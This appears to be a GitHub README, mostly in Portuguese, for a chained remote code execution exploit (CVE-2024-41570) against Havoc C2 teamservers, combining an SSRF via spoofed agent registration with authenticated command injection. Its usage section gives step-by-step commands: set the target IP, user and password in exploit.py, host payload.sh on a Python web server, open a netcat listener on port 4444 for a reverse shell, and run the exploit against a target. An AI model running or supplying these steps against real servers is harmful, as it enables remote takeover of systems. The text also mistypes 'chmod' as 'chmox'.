
Este é um RCE encadeado no framework Havoc C2 usando os PoCs de github.com/chebuya e github.com/IncludeSecurity
Este é um RCE encadeado (CVE-2024-41570) no framework Havoc C2.
Injeção de comandos: o Havoc é vulnerável a injeção de comandos, permitindo que um usuário autenticado execute comandos no Teamserver. Afeta as versões 0.3 até a versão mais recente, a 0.6. O perfil padrão do Havoc contém senhas embutidas (hardcoded); portanto, um operador de C2 descuidado o suficiente para usar o perfil padrão em uma rede pública pode ser imediatamente explorado.
SSRF: essa vulnerabilidade é explorada por meio de falsificação (spoofing) do registro e check-ins de um agente demon para abrir um socket TCP no teamserver e ler/gravar dados a partir dele. Isso permite que atacantes vazem os IPs de origem dos teamservers e muito mais.
Encadeamento: abusar do SSRF para entregar um payload autenticado de injeção de comandos.

1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh
-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmox +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)
# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345
Créditos a @chebuya e @Hyperreality